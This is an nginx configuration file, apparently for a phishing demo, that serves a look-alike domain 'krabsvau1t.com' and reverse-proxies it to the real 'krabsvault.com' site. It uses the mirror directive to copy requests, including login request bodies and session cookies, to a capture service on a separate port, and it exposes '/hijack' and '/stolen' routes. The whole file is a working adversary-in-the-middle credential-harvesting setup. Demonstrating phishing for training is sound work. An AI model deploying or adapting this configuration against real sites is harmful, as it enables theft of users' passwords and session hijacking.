events {}

http {
  # KrabsVault = legitimate website
  server {
    listen 443 ssl;
    server_name krabsvault.com;

    ssl_certificate     /etc/nginx/certs/krabsvault.com.pem;
    ssl_certificate_key /etc/nginx/certs/krabsvault.com-key.pem;

    location / {
      proxy_pass http://host.containers.internal:8000;
      proxy_http_version 1.1;
      proxy_set_header Host $host;
      proxy_set_header X-Forwarded-Proto $scheme;
      proxy_set_header Upgrade $http_upgrade;
      proxy_set_header Connection "upgrade";
    }
  }

  # KrabsVau1t = Phishing website
  server {
    listen 443 ssl;
    server_name krabsvau1t.com;

    ssl_certificate     /etc/nginx/certs/krabsvau1t.com.pem;
    ssl_certificate_key /etc/nginx/certs/krabsvau1t.com-key.pem;

    # Simple trick for the demo: all the trafic to the phishing site is redirected to the legit one
    location / {
      proxy_pass http://host.containers.internal:8000;
      proxy_http_version 1.1;
      proxy_set_header Host krabsvault.com;
      proxy_set_header X-Forwarded-Proto $scheme;
      proxy_set_header Upgrade $http_upgrade;
      proxy_set_header Connection "upgrade";
    }

    # But all requests are mirrored to a capture endpoint to steal the session cookie
    location = / {
      mirror /capture;
      proxy_pass http://host.containers.internal:8000;
      proxy_http_version 1.1;
      proxy_set_header Host krabsvault.com;
      proxy_set_header X-Forwarded-Proto $scheme;
    }

    # Avoid actual endpoints from the phishing app to be redirected to the legit one
    location = /capture {
      internal;
      proxy_pass http://host.containers.internal:8666/capture;
      proxy_set_header Host $host;
      proxy_set_header X-Original-URI $request_uri;
    }
    
    location = /hijack {
      proxy_pass http://host.containers.internal:8666/hijack;
      proxy_set_header Host $host;
      proxy_set_header X-Forwarded-Proto $scheme;
    }

    location /stolen {
      proxy_pass http://host.containers.internal:8666;
      proxy_set_header Host $host;
      proxy_set_header X-Forwarded-Proto $scheme;
      proxy_http_version 1.1;
      proxy_set_header Upgrade $http_upgrade;
      proxy_set_header Connection "upgrade";
    }

    location = /login {
      # 1. Steal the login payload
      mirror /capture;
      mirror_request_body on;

      # 2. Pass the request to the legit website
      proxy_pass http://host.containers.internal:8000/login;
      proxy_http_version 1.1;
      proxy_set_header Host krabsvault.com;
      proxy_set_header X-Forwarded-Proto $scheme;
    }

  }
}